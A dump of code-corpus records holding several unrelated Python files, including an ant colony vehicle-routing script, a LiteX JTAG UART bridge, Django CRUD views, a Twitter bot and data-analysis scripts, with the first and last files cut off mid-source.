path:\n\t\tweight+=graph[x][y]\n\t\tx=y\n\tweight+=graph[x][dpot]\n\treturn weight\n\ndef get_best_solution(solution):\n\t# this function returns path which has min length.\n\tma=solution[0]\n\tfor soln in solution:\n\t\tif ma[0]>soln[0]:\n\t\t\tma=soln\n\treturn ma\n\ndef opt_2(path):\n\t#making 2 path. temp_path is old path. \"path\" is the path where all the 2-opt changes gonna happen.\n\ttemp_path = path.copy()\n\n\t# path = [2,3,4,5,2,3,0]\n\t# selecting rendomly node from the path and removing that node.\n\trnd_node = np.random.choice(path[:-1])\n\tpath.remove(rnd_node)\n\n\t#inserting the selected node randomaly.\n\tpath.insert( randint(0, len(path[:-1])) ,rnd_node)\n\n\t#path = [ 2,5,3,4,2,3,0]\n\t\n\t#If the new path has less cost than old one, update the path by returning new one.\n\tif getWeight(temp_path,0) > getWeight(path,0):\n\t\treturn path\n\telse:\n\t\treturn temp_path\n\ndef start_spreading_ants(nvis,shortest_dist):\n\tglobal graph\n\tglobal ph\n\tglobal num_node\n\tglobal nodes\n\n\t#solution will store all the paths which are coverd by 13 ants.\n\tsolution = []\n\n\tfor i in range(ants):\n\t\t#nvis is list of not visited nodes.\n\t\tnnvis = nvis.copy()\n\t\t#selecting randome starting point.\n\t\tdpot = np.random.choice(nnvis)\n\t\tnnvis.remove(dpot)\n\t\t#ant will start from the mentioned dpot.\n\t\tpath = start_ant(nnvis,dpot)\n\t\t# path = opt_2(path)\n\t\tsolution.append( (getWeight(path,0),path) )\n\n\t# \"get_best_solution\" will return shortest path coverd among all the ants.\n\tbest_solution = get_best_solution(solution)\n\n\t# \"opt_2\" will apply 2-opt method on best solution.\n\topt_best_solution = opt_2(best_solution[1])\n\t# upedating the best solution.\n\t#todo:\n\tbest_solution = ( getWeight(opt_best_solution,0) , opt_best_solution )\n\t\n\t#updating the shortest distance.\n\tif shortest_dist[0] > best_solution[0]:\n\t\tshortest_dist=best_solution\n\n\t#This will update the feromone level.\n\tupdate_feromone(0,best_solution,shortest_dist)\n\treturn shortest_dist\n\ndef main():\n\tglobal alpha\n\tglobal beta\n\tglobal dens\n\tglobal iterations\n\n\t#taking input from user\n\tprint(\"------------------------------------------------------------------\")\n\tveh1 = input(\"Vehical 1's nodes :\").split(' ')\n\tveh2 = input(\"Vehical 2's nodes :\").split(' ')\n\tveh3 = input(\"Vehical 3's nodes :\").split(' ')\n\n\tveh1 = [ int(i) for i in veh1 ]\n\tveh2 = [ int(i) for i in veh2 ]\n\tveh3 = [ int(i) for i in veh3 ]\n\n\t# veh1 = [1,4,6,9,10,12]\n\t# veh2 = [8,11,13,2,5]\n\t# veh3 = [3,7]\n\n\tprint(\"alpha:\",alpha, \" | beta:\", beta, \" | density\",dens, \" | Iterations: \",iterations, \" | ants:\",ants)\n\n\t# code for n number of iteration\n\tfor itr in range(500):\n\t\tread_data()\n\n\t\titerations=itr\n\t\t#iteration = 1\n\t\t# for n number of iterations, spreading ants in the graph.\n\t\tshortest_dist = (10**200,[])\n\n\t\tfor _ in range(iterations):\n\t\t\t# this will start spreading ants in the graph.This will return shortest distance of all the previous iterations\n\t\t\tshortest_dist = start_spreading_ants(veh1,shortest_dist)\n\t\tsd1=shortest_dist\n\n\t\tshortest_dist = (10**200,[])\n\t\tfor _ in range(iterations):\n\t\t\t# this will start spreading ants in the graph.This will return shortest distance of all the previous iterations\n\t\t\tshortest_dist = start_spreading_ants(veh2,shortest_dist)\n\t\tsd2=shortest_dist\n\n\t\tshortest_dist = (10**200,[])\n\t\tfor _ in range(iterations):\n\t\t\t# this will start spreading ants in the graph.This will return shortest distance of all the previous iterations\n\t\t\tshortest_dist = start_spreading_ants(veh3,shortest_dist)\n\t\tsd3=shortest_dist\n\n\t\t#printing result, shortest distance of all the vehicals.\n\t\tprint(itr,\",\",sd1[0],\",\",sd2[0],\",\",sd3[0])\n\nif __name__ == '__main__':\n\tmain()\n\n\n\t\n\t# shortest_dist = (10*200,[])\n\t# for _ in range(iterations):\n\t# \tshortest_dist = start_spreading_ants(veh1,shortest_dist)\n\t# sd1=shortest_dist\n\t# print(\"Vehical 1 : \",shortest_dist)\n\n\t# shortest_dist = (10*200,[])\n\t# for _ in range(iterations):\n\t# \tshortest_dist = start_spreading_ants(veh2,shortest_dist)\n\t# sd2=shortest_dist\n\t# print(\"Vehical 2 : \",shortest_dist)\n\n\t# shortest_dist = (10*200,[])\n\t# for _ in range(iterations):\n\t# \tshortest_dist = start_spreading_ants(veh3,shortest_dist)\n\t# sd3=shortest_dist\n\t# print(\"Vehical 3 : \",shortest_dist)\n\t# print(\",sd1[0],\",\",sd2[0],\",\",sd3[0])\n\n\n\n\t# for q in [0.5]:\n\t# \tfor i in [0.1,0.2,0.3,0.5,0.6,0.8,1]:\n\t# \t\tfor j in [0.2,0.3,0.5,0.6,0.8,0.9,1]:\n\t# \t\t\talpha=i\n\t# \t\t\tbeta=j\n\t# \t\t\tdens=q\n\t# \t\t\tshortest_dist = (10*200,[])\n\t# \t\t\tfor _ in range(iterations):\n\t# \t\t\t\tshortest_dist = start_spreading_ants(veh1,shortest_dist)\n\t# \t\t\tsd1=shortest_dist\n\t# \t\t\t#print(\"Vehical 1 : \",shortest_dist)\n\n\t# \t\t\tshortest_dist = (10*200,[])\n\t# \t\t\tfor _ in range(iterations):\n\t# \t\t\t\tshortest_dist = start_spreading_ants(veh2,shortest_dist)\n\t# \t\t\tsd2=shortest_dist\n\t# \t\t\t#print(\"Vehical 2 : \",shortest_dist)\n\n\t# \t\t\tshortest_dist = (10*200,[])\n\t# \t\t\tfor _ in range(iterations):\n\t# \t\t\t\tshortest_dist = start_spreading_ants(veh3,shortest_dist)\n\t# \t\t\tsd3=shortest_dist\n\t# \t\t\t#print(\"Vehical 3 : \",shortest_dist)\n\t\t\t\t# print(q,\",\",i,\",\",j,\",\",sd1[0],\",\",sd2[0],\",\",sd3[0])\n\n#TODO\n#1. name of variables(ACC to problem)\n#2. MM ideal time.","sub_path":"elist.py","file_name":"elist.py","file_ext":"py","file_size_in_byte":7438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"130836359","text":"#!/usr/bin/env python3\n\n#\n# This file is part of LiteX.\n#\n# Copyright (c) 2020 Florent Kermarrec \n# SPDX-License-Identifier: BSD-2-Clause\n\n# Proof of Concept to use the JTAG UART with lxterm.\n\nimport os\nimport pty\nimport threading\nimport telnetlib\nimport time\nimport argparse\n\nfrom litex.build.openocd import OpenOCD\n\nparser = argparse.ArgumentParser(description=\"LiteX JTAG UART bridge tool\")\nparser.add_argument(\"--config\", default=\"openocd_xc7_ft2232.cfg\", help=\"OpenOCD config file\")\nparser.add_argument(\"--telnet-port\", default=\"20000\", help=\"OpenOCD telnet port\")\nargs = parser.parse_args()\n\ndef openocd_jtag_telnet():\n\tprog = OpenOCD(args.config)\n\tprog.stream(int(args.telnet_port))\n\nm, s = pty.openpty()\nprint(\"LiteX JTAG UART created: {}\".format(os.ttyname(s)))\n\nopenocd_jtag_telnet_thread = threading.Thread(target=openocd_jtag_telnet)\nopenocd_jtag_telnet_thread.start()\n\ntime.sleep(1)\n\nt = telnetlib.Telnet(\"localhost\", int(args.telnet_port))\n\ndef pty2telnet(m):\n while True:\n r = os.read(m, 1)\n t.write(r)\n if r == bytes(\"\\n\".encode(\"utf-8\")):\n \tt.write(\"\\r\".encode(\"utf-8\"))\n t.write(\"\\n\".encode(\"utf-8\"))\n\ndef telnet2pty(m):\n\twhile True:\n\t\tr = t.read_some()\n\t\tos.write(m, bytes(r))\n\npty2telnet_thread = threading.Thread(target=pty2telnet, args=[m])\npty2telnet_thread.start()\n\ntelnet2pty(m)\n","sub_path":"litex/tools/litex_jtag_uart.py","file_name":"litex_jtag_uart.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"302826062","text":"import time\nfrom datetime import datetime\nfrom matplotlib import pyplot as plt\nimport matplotlib\n\ndef main():\n fileopen = open('datadict\\\\temp\\\\20190118.txt', 'r')\n datadList = []\n count = 1\n oldTimestamp = 0\n continueCount = 1\n for lineData in fileopen:\n timestamp = int(int(lineData.split(',')[0])/1000)\n if oldTimestamp == timestamp:\n continue\n else:\n oldTimestamp = timestamp\n # timeArray = time.localtime(timestamp)\n timeArray = datetime.fromtimestamp(timestamp)\n timeSt = string_toDatetime(timeArray)\n temp = float(lineData.split(',')[1])\n # plt.plot(timestamp, temp, ls=\"-.\", lw=2, c=\"c\",)\n if len(datadList) < 10:\n datadList.append(temp)\n else:\n avag = mediannum(datadList)\n if avag - 3 < temp < avag + 3:\n # print('√ datadList = {}, avag = {:.2f}, temp = {}'.format(datadList, avag, temp))\n datadList.pop(0)\n datadList.append(temp)\n continueCount = 1\n continue\n else:\n print('× {} [{}] {} datadList = {}\\t avag = {:.2f}\\t temp = {}'.format(count, continueCount, timeSt, datadList, avag, temp))\n datadList.pop(0)\n datadList.append(temp)\n count += 1\n continueCount += 1\n # plt.show()\n fileopen.close()\n\n\n\ndef string_toDatetime(string):\n # return time.strftime(\"%H:%M:%S\", string)\n return string.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n\n#计算平均数\ndef averagenum(num):\n nsum = 0\n for i in range(len(num)):\n nsum += num[i]\n return nsum / len(num)\n\n#计算中位数\ndef mediannum(num):\n listnum = [num[i] for i in range(len(num))]\n listnum.sort()\n lnum = len(num)\n if lnum % 2 == 1:\n i = int((lnum + 1) / 2)-1\n return listnum[i]\n else:\n i = int(lnum / 2)-1\n return (listnum[i] + listnum[i + 1]) / 2\n\n#计算众数\ndef publicnum(num, d = 0):\n dictnum = {}\n for i in range(len(num)):\n if num[i] in dictnum.keys():\n dictnum[num[i]] += 1\n else:\n dictnum.setdefault(num[i], 1)\n maxnum = 0\n maxkey = 0\n for k, v in dictnum.items():\n if v > maxnum:\n maxnum = v\n maxkey = k\n return maxkey\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"好邻居/demo1.py","file_name":"demo1.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"653102719","text":"# Uses python3\nn = int(input())\nA = [int(x) for x in input().split()]\nassert(len(A) == n)\n\nresult = 0\nindex = 0\nfor i in range(1, n):\n if A[i] > A[index]:\n index = i\nA[index], A[n-1] = A[n-1], A[index]\n\nindex=0\nfor j in range(1, n-1):\n if A[j] > A[index]:\n index = j\nA[index], A[n-2] = A[n-2], A[index]\nresult = A[n-2]*A[n-1]\n\nprint(result)\n\n","sub_path":"week1_programming_challenges/2_maximum_pairwise_product/max_pairwise_product.py","file_name":"max_pairwise_product.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"51421442","text":"# -*- coding: iso-8859-1 -*-\n#\n# $Id: ebmBinaryFile.py,v 1.1.2.1 2012/10/26 08:00:20 xantgui Exp $\n#\n# Copyright (c) Ericsson España S.A., 2011.\n# All rights reserved.\n#\n# This product or document is proprietary to and embodies the\n# confidential technology of Ericsson España S.A.\n# Possession, use, duplication or distribution of this product\n# or document is authorized only pursuant to a valid written\n# license from Ericsson España S.A\n\"\"\"\nThis module contains the wrapper to handle a EBM binary file. \n\"\"\"\nfrom ebmDecoder import EBMDecoder\n\nclass EBMBinaryFile(object):\n '''\n This class implements a wrapper to handle the EBM binary data found in a file.\n '''\n\n\n def __init__(self, binary_file_path, ebm_decoder = None):\n '''\n Constructor\n '''\n self.binary_file_path = binary_file_path\n self.ebm_decoder = ebm_decoder\n \n self._write_file = None\n \n def __del__(self):\n \"\"\"\n Destructor\n \"\"\"\n self._write_file.flush()\n self._write_file.close()\n \n \n def get_binary_file_path(self):\n \"\"\"\n Returns the binary file path stored in this class.\n @rtype: str\n \"\"\"\n return self.binary_file_path\n \n \n def get_ebm_decoder(self):\n \"\"\"\n Returns the L{EBMDecoder} stored in this class to parse the records\n @rtype: L{EBMDecoder}\n \"\"\"\n return self.ebm_decoder\n \n def set_ebm_decoder(self, ebm_decoder):\n \"\"\"\n Sets the ebm_decoder in this class to parse the records\n @param ebm_decoder: the L{EBMDecoder} to parse the records\n @type ebm_decoder: L{EBMDecoder}\n \"\"\"\n self.ebm_decoder = ebm_decoder\n \n def read_records(self):\n \"\"\"\n Reads and returns all the record found in the binary file. To use this method,\n the L{EBMDecoder} has to be set.\n @rtype: list(dict)\n \"\"\" \n \n if self.ebm_decoder == None:\n return None\n binary_data = self.read_binary_data()\n record_list = []\n \n while len(binary_data) > 0:\n record_length = self.ebm_decoder.get_record_length(binary_data)\n if len(binary_data) >= record_length:\n current_record_data = binary_data[0:record_length]\n current_record = self.ebm_decoder.decode(current_record_data)\n record_list.append(current_record)\n binary_data = binary_data[record_length:]\n \n return record_list\n \n def read_binary_data(self):\n \"\"\"\n Returns the bytes found in the binary file.\n @rtype: bytearray\n \"\"\"\n b_file = open(self.binary_file_path, \"r\")\n data = b_file.read()\n \n b_file.close()\n return bytearray(data)\n\n \n def write_binary_data(self, binary_data):\n \"\"\"\n Writes the binary_data at the end of the binary file.\n \"\"\"\n if not self._write_file:\n self._write_file = open(self.binary_file_path, \"w\")\n \n self._write_file.write(str(binary_data))\n self._write_file.flush()\n# self._write_file.close()\n# self._write_file =None\n \n def close(self):\n \"\"\"\n Close the binary file used to write the binary data.\n \"\"\"\n self._write_file.close()\n\n\n##### TEST UNIT #####\ndef main():\n decoder = EBMDecoder('../../data/ebm/ebm_event_specification.xml')\n binary_file = EBMBinaryFile(\"../../data/ebm/ebm_binary_file\", decoder)\n records1 = binary_file.read_records() \n \n \n binary_file2 = EBMBinaryFile(\"/tmp/ebm_binary_file\", decoder)\n binary_file2.write_binary_data(binary_file.read_binary_data())\n records2 = binary_file2.read_records()\n \n #print records1\n #print records2 \n assert len(records1) == len(records2), \"r1 len(%s) ; r2 len(%s)\" %(len(records1), len(records2))\n \n \n \n \n \nif __name__ == '__main__' :\n main()\n","sub_path":"sds/back_test/ref/ebm/ebmBinaryFile.py","file_name":"ebmBinaryFile.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"559580533","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom myDeckToolDatabase.DAOLPMTABLES import DAOLPMTABLES\ndao = DAOLPMTABLES()\nmodelo1 = 'modelo 1'\nmodelo2 = 'modelo 2'\nmodelo3 = 'modelo 3'\ncartas = 30\nunidades = 1\n\nlista1 = np.array(list(dao.getTempo(modelo1,cartas,unidades)))\nlista2 = np.array(list(dao.getTempo(modelo2,cartas,unidades)))\nlista3 = np.array(list(dao.getTempo(modelo3,cartas,unidades)))\n\nprint(lista1)\nprint(lista2)\nprint(lista2[1])\nprint(lista3)\n\n# Calculate the average\nif unidades==1:\n lista1_mean = np.mean(lista1)\nlista2_mean = np.mean(lista2)\nlista3_mean = np.mean(lista3)\n\n# Calculate the standard deviation\nif unidades==1:\n lista1_std = np.std(lista1)\nlista2_std = np.std(lista2)\nlista3_std = np.std(lista3)\n\n# Define labels, positions, bar heights and error bar heights\nif unidades!=1:\n labels = ['Modelo 2', 'Modelo 3']\n x_pos = np.arange(len(labels))\n CTEs = [lista2_mean, lista3_mean]\n error = [lista2_std, lista3_std]\nelse:\n labels = ['Modelo 1', 'Modelo 2', 'Modelo 3']\n x_pos = np.arange(len(labels))\n CTEs = [lista1_mean, lista2_mean, lista3_mean]\n error = [lista1_std, lista2_std, lista3_std]\n\n# Build the plot\nfig, ax = plt.subplots()\nax.bar(x_pos, CTEs,\n yerr=error,\n align='center',\n alpha=0.5,\n ecolor='black',\n capsize=10)\nax.set_ylabel('Tempo(segundos)')\nax.set_xticks(x_pos)\nax.set_xticklabels(labels)\nax.set_title('Modelo Linear')\nax.yaxis.grid(True)\n\n\n# Save the figure and show\nplt.tight_layout()\nplt.savefig('modelosLineares-'+str(cartas)+'-'+str(unidades)+'.png')\nplt.show()\n\nf = open('modelosLineares-'+str(cartas)+'-'+str(unidades)+'.txt','w')\nf.write('Media\\n')\nif unidades==1:\n f.write('modelo 1:'+str(lista1_mean)+\"\\n\")\nf.write('modelo 2:'+str(lista2_mean)+\"\\n\")\nf.write('modelo 3:'+str(lista3_mean)+\"\\n\")\nf.write('Desvio Padrao\\n')\nif unidades==1:\n f.write('modelo 1:'+str(lista1_std)+\"\\n\")\nf.write('modelo 2:'+str(lista2_std)+\"\\n\")\nf.write('modelo 3:'+str(lista3_mean)+\"\\n\")\nf.close()\n","sub_path":"src/myDeckToolVisualizations/modelosLineares/plotLinearModels.py","file_name":"plotLinearModels.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"469545599","text":"# -*- coding: utf-8 -*-\nimport os\nimport settings\nfrom string import Template\nfrom core.storage.adapters import fetch_raw\nfrom utils.parse import ConfigLoader\nfrom utils.products import get_working_directory, mkdir_if_not_exist\n\n# 39 points for profile and 68 points for the front\nFRONT_POINT_NUM = 68\nPROFILE_POINT_NUM = 39\n\npts_template = Template(\"\"\"version: 1\nn_points: $point_num\n{\n$point_pairs\n}\n\"\"\")\n\ndef is_profile_face(points):\n\treturn any(filter(lambda x: x.startswith('-'), points))\t\t# the redundant points are negative for profiles\n\ndef refine(queryset):\n\tresult = {}\n\tdata = queryset[1:]\n\tfor line in data:\n\t\titems = line.strip().split('\\t')\n\t\timage_name, point_list = items[0], items[-1].split(',')\n\n\t\tif is_profile_face(point_list):\n\t\t\tpoint_list = point_list[:PROFILE_POINT_NUM*2]\t# only 39 points were to keep\n\n\t\tif len(point_list) != FRONT_POINT_NUM*2 and len(point_list) != PROFILE_POINT_NUM*2: \n\t\t\tprint(\"error: only %d points were given for %s\" % (len(points)/2, image))\n\t\t\tsys.exit(1)\n\n\t\tresult[image_name] = map(lambda x: x.replace('*', '-'), point_list)\n\treturn result\n\n# pts is a special format only including version, n_points, and points surrounded with a bracket\ndef export_pts(result, path):\n\tfor image, points in result.items():\n\t\tpoint_pairs = []\n\t\tfor i in range(0, len(points), 2):\n\t\t\tpoint_pairs.append(str(points[i])+' '+str(points[i+1]))\n\n\t\timage_path = os.path.join(path, os.path.splitext(image)[0]+'_0.pts')\n\t\twith open(image_path, 'w') as f:\n\t\t\tf.write(pts_template.substitute(point_num=len(point_pairs), point_pairs='\\n'.join(point_pairs)))\n\ndef main():\n config = ConfigLoader()\n title = config.project['title']\n product = config.project['product']\n\n queryset = fetch_raw(title)\n result = refine(queryset)\n product_path = os.path.join(get_working_directory(), product)\n mkdir_if_not_exist(product_path)\n export_pts(result, product_path)\n \n\t\ndef usage():\n return \"exports data for Face annotation - 68 for front and 39 for profile\"","sub_path":"src/apps/app_face6839.py","file_name":"app_face6839.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"97920266","text":"from django.urls import path\nfrom .views import (\n create_order, order_detail, orders\n \n )\napp_name = 'orders'\n\nurlpatterns = [\n path('orders', orders, name='orders'),\n path('order/create', create_order, name='create_order'),\n path('order/', order_detail, name='order_detail'),\n]\n","sub_path":"orders/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"159615252","text":"# TkVertexLayout struct\n\nfrom .Struct import Struct\n\nSTRUCTNAME = 'TkVertexLayout'\n\nclass TkVertexLayout(Struct):\n def __init__(self, **kwargs):\n\n \"\"\" Contents of the struct \"\"\"\n self.ElementCount = kwargs.get('ElementCount', None)\n self.Stride = kwargs.get('Stride', None)\n self.PlatformData = kwargs.get('PlatformData', None)\n self.VertexElements = kwargs.get('VertexElements', None)\n \"\"\" End of the struct contents\"\"\"\n\n \"\"\" Run code to convert struct contents into self.data_dict \"\"\"\n self._create_dict()\n\n # Parent needed so that it can be a SubElement of something\n self.parent = None\n self.STRUCTNAME = STRUCTNAME\n","sub_path":"nms_imp/classes/TkVertexLayout.py","file_name":"TkVertexLayout.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"584718910","text":"import os\nfrom django.db.models import Max\nimport TwitterAPI\nfrom .models import (TwitterUser, Tweet, HashTag)\n\n\nclass Twitterbot(object):\n\n consumer_key = 'Ktp2lfQ69lw6ZIfJjr1w3JBq5'\n consumer_secret = os.environ.get('TWITTERAPI_CONSUMER_SECRET', None)\n api = None\n response = None\n first_time = True\n twitter_account = None\n tweet_count = None\n\n def __init__(self, tweet_count=200, twitter_account='stackdevjobs'):\n\n self.tweet_count = tweet_count\n self.twitter_account = twitter_account\n\n self.api = TwitterAPI.TwitterAPI(\n self.consumer_key,\n self.consumer_secret,\n auth_type='oAuth2'\n )\n\n def readTweets(self):\n for tweet in self.response.get_iterator():\n if tweet['text'] and tweet['entities']['hashtags']:\n if self.first_time:\n \"\"\"Parse for the user info during the first call\"\"\"\n \n twitteruser, tu_ok = TwitterUser.objects.get_or_create(\n descriptive_name=tweet['user']['name'],\n twitter_handle=tweet['user']['screen_name'],\n profile_img_url=tweet['user']['profile_image_url'],\n url=tweet['user']['url']\n )\n\n self.first_time = False\n\n # save the tweet\n tw, tw_ok = Tweet.objects.get_or_create(\n text=tweet['text'],\n created_at=tweet['created_at'],\n message_id=tweet['id'],\n user=TwitterUser.objects.last()\n )\n\n # look for hashtags\n for tag in tweet['entities']['hashtags']:\n hashtag, created = HashTag.objects.get_or_create(\n name=tag['text'],\n tweet=Tweet.objects.last())\n\n def refresh(self):\n # make the request\n self.response = self.api.request(\n 'statuses/user_timeline',\n {'screen_name': self.twitter_account,\n 'count': self.tweet_count})\n\n self.readTweets()\n\n\n\"\"\" def getHashTags(self):\n return self.hashtags.keys()\n\n def getHashTagData(self):\n return self.hashtags\n\n def getTweets(self, hashtag=None):\n if not hashtag:\n return self.tweets\n else:\n return self.filterTweets(hashtag)\n\n def filterTweets(self, hashtag):\n return [tweet for tweet in self.tweets if hashtag in tweet['hashtags']]\n\"\"\"\n","sub_path":"melbproject/jobflow/tweets.py","file_name":"tweets.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"317866052","text":"import argparse\nimport os\nimport yaml\nfrom src.process import Process\n\nclass Start():\n \n def __init__(self, config):\n\n name_yml = os.path.abspath(config)\n with open(name_yml, 'r') as ymlfile:\n self.cfg = yaml.load(ymlfile,Loader=yaml.BaseLoader)\n\n PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))\n LOGS_DIR = os.path.join(PROJECT_ROOT, 'log')\n PHOTOS_DIR = os.path.join(PROJECT_ROOT, 'photos')\n\n self.photos_dir = PHOTOS_DIR\n\n if not os.path.exists(LOGS_DIR):\n os.makedirs(LOGS_DIR)\n if not os.path.exists(PHOTOS_DIR):\n os.makedirs(PHOTOS_DIR)\n\n def main(self):\n Process(self.cfg, self.photos_dir).process()\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-cfg','--config',default='./config.yml')\n args = parser.parse_args()\n config = args.config\n\n Start(config).main()","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"200734838","text":"# importing pandas, setting tmp_data for pandas to read csv file, then transfering file to numpy as data.\nimport pandas as pd\ntmp_data = pd.read_csv('Dataset.csv')\ndata = tmp_data.to_numpy()\n# setting up a function that will print only the unique names from the Location list\ndef unique(num): \n assert num >= 0, \"Input a column number\"\n # Creating a list called cols that contains all the data from the col\n cols = (data[:, num]).tolist()\n # new empty list\n unique_list = [] \n # for any city in col\n for ii in cols: \n # it will be appended to list if it's not in unique list\n if ii not in unique_list: \n unique_list.append(ii) \n # returns the list\n return unique_list\n# testing the function with my data\nprint(unique(1)) # seeing the unique locations\n# setting a function that will count a list\ndef count(numb1, numb2):\n assert numb1 >= 0, \"Input a column number\"\n assert numb2 >= 0, \"Input a column number\"\n # creating a new list of lists called bicols that has data from 2 cols\n bicols = (data[:, [numb1,numb2]]).tolist()\n # converting list of lists to list of tuples so it is easier for the program to find uniques/count. \n bicols = [tuple(i) for i in bicols]\n check = False\n # need new empty list\n new_list = [] \n ii = 0\n # for loop checking if entry in new_list exists.\n for x in bicols: \n if x in new_list: \n check = True\n continue\n # if entry is not there it will append it, if there, it will not re-append it but will increase the count of ii\n else: \n ii = 0\n #\n for y in bicols: \n if y[0] == x[0] and y[1] == x[1]: \n ii = ii + 1\n # printing the number of occurences only for entries with multiple occurences \n if(ii > 1): \n print(x, \"-\", ii) \n new_list.append(x) \n if check == False: \n # let's me know if an entry does not repeat\n print(\"No repeats\")\n# testing the function\n# ran function successfully on Location_Species\ncount(1,2)\ndef mass_plotting(xdata, ystart, yend):\n assert xdata >= 0, \"Input x column data\"\n assert ystart >= 0, \"Input y starting column\"\n assert yend >= 0, \"Input y ending column\"\n # importing matplotlib.pyplot as plt since I need it later\n import matplotlib.pyplot as plt\n # creating a list of all the column names located in header\n header_list = list(tmp_data)\n # since there are several columns describing the climate an individual tree is in,\n # and I want to compare foliar area to all of them, I made a function to plot Foliar Area vs. all of the climate columns\n # for loop searches through columns 19-57 which are the climate ones\n for column in range(ystart, yend):\n column_list = (data[:, [xdata,column]]).tolist()\n assert column_list != 0, \"Columns contain no data\"\n # made a list of tuples in [(x,y)] format\n column_list = [tuple(i) for i in column_list]\n xval = [x[0] for x in column_list]\n yval = [y[1] for y in column_list]\n # plotted with appropriate x and y labels\n plt.scatter(xval,yval)\n plt.xlabel(header_list[xdata])\n plt.ylabel(header_list[column])\n plt.show()\n# testing the function\nmass_plotting(9, 19, 57)\n# function below uses the csv module and DictReader to have every row be a dictionary where the keys are the header names.\n# This function only goes to row 10 (which can be changed)\n# it's useful to have in case I need this for any row I want. \ndef open_with_dict(file):\n # importing csv module\n import os\n assert os.path.exists(file) == True\n import csv\n with open(file) as f:\n # assigning shorter name to csv.DictReader(f)\n reader = csv.DictReader(f)\n for i, row in enumerate(reader):\n # printing key (header name) and value\n print(dict(row))\n # assignming breaks between dictionaries so it's easier to read\n print(\"\\n\")\n # this number is only to stop if from being two long, the actual file will be longer\n if i > 10:\n break\n# testing the function\nopen_with_dict(\"Dataset.csv\")\n# A lot of the climate data had the same values since many came from the same area\n# I want to count all the occurances for a value for all the climate data columns\n# This function counts the occurances for columns 9-56, and pushes the counts to a dictionary for each column\ndef count_to_dict(ystart, yend):\n for column in range(ystart,yend):\n header_list = list(tmp_data)\n # for loop searches through columns 19-57 which are the climate ones\n column_list = tmp_data[\"{}\".format(header_list[column])].tolist() # {}.format used since column names change\n count_dict = dict() # new dict\n # for loop finds all the occurances of an element and assigns the value as frequency of the element (key)\n for ii in column_list:\n count_dict[ii] = count_dict.get(ii, 0) + 1\n print(count_dict) # printing dict for one column\n print(\"\\n\") # helps to space them out\n# testing the function\ncount_to_dict(19, 57)\n","sub_path":"python-scripting/Dataset_script.py","file_name":"Dataset_script.py","file_ext":"py","file_size_in_byte":5214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"519989061","text":"from django.shortcuts import render , redirect\nfrom letsdo.forms import EmployeeForm\nfrom letsdo.models import Employee\n\n\n# Create your views here.\ndef emp(request):\n if request.method == \"GET\":\n print(\"djjd------------------------==========\")\n form = EmployeeForm(request.GET)\n\n if form.is_valid():\n try:\n form.save()\n return redirect(\"/show\")\n except:\n pass\n\n\n else:\n form = EmployeeForm()\n return render(request,\"index.html\",{'form':form})\n\ndef show(request):\n employees=Employee.objects.all()\n print(employees)\n return render(request,\"show.html\",{'employees':employees})\n\n\ndef edit(request, id):\n employee = Employee.objects.get(id=id)\n return render(request,\"edit.html\",{'employee' : employee } )\n\n\ndef update(request, id):\n employee = Employee.objects.get(id=id)\n form = EmployeeForm(request.GET, instance=employee)\n if form.is_valid():\n form.save()\n return redirect('/show')\n return render(request,\"edit.html\", {'employee': employee })\n\n\ndef delete(request, id):\n print(id,\"=================================\")\n employee=Employee.objects.get(id=id)\n employee.delete()\n return redirect(\"/show\")\n\n\n\n","sub_path":"letsdo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"436625946","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\nimport argparse\nimport datetime\nimport logging\nimport pandas as pd\n\nfrom rdflib import URIRef, Graph, Literal, RDF, XSD\nfrom mapping import CASUALTY_MAPPING, GRAVEYARD_MAPPING\nfrom namespaces import DCT, SKOS, SCHEMA_CAS, SCHEMA_WARSA, bind_namespaces, CEMETERIES, DATA_CAS\n\n\nclass RDFMapper:\n \"\"\"\n Map tabular data (currently pandas DataFrame) to RDF. Create a class instance of each row.\n \"\"\"\n\n def __init__(self, mapping, instance_class, cemeteries=(), loglevel='WARNING'):\n self.mapping = mapping\n self.instance_class = instance_class\n self.table = None\n self.data = Graph()\n self.schema = Graph()\n # self.errors = pd.DataFrame(columns=['nro', 'sarake', 'virhe', 'arvo'])\n self.errors = []\n self.cemeteries = cemeteries\n\n logging.basicConfig(filename='casualties.log',\n filemode='a',\n level=getattr(logging, loglevel),\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n self.log = logging.getLogger(__name__)\n\n def map_row_to_rdf(self, 